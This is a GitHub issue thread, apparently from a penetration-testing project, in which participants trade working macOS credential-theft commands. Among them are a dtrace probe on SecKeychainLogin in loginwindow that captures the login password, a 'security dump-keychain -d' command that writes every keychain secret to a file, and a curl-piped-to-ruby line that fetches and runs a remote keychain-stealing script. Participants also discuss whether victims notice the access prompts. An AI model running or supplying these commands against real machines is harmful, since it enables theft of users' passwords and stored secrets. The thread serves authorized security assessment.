Open WebBreacher opened 9 years ago
This is what I get:
dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
:cry: System info:
$ uname -a
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
@OJ - It was on Twitter so it has to be true!
Seriously though, the first command appears to work on my MBP:
$ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')
dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe
And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.
$ uname -a
Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).
Fun stuff though!
No worries....good to know where it does/does not work too. I'm on 10.9.5 OS X
curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby
Co-worker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again, you need to click allow, which means you need GUI access, but I have pulled that off remotely with VNC. Not super stealthy, but gets the job done.
Leon Johnson
On Jun 25, 2015, at 6:48 AM, OJ Reeves notifications@github.com wrote:
> This is what I get:
> dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system
> System info:
> $ uname -a
> Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
Don't have time to add this in the appropriate place:
sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}') (from https://twitter.com/fel1x/status/613420320104558592)
Dump whole OS X keychain: security dump-keychain -d login.keychain > keychain.txt && srm keychain.txt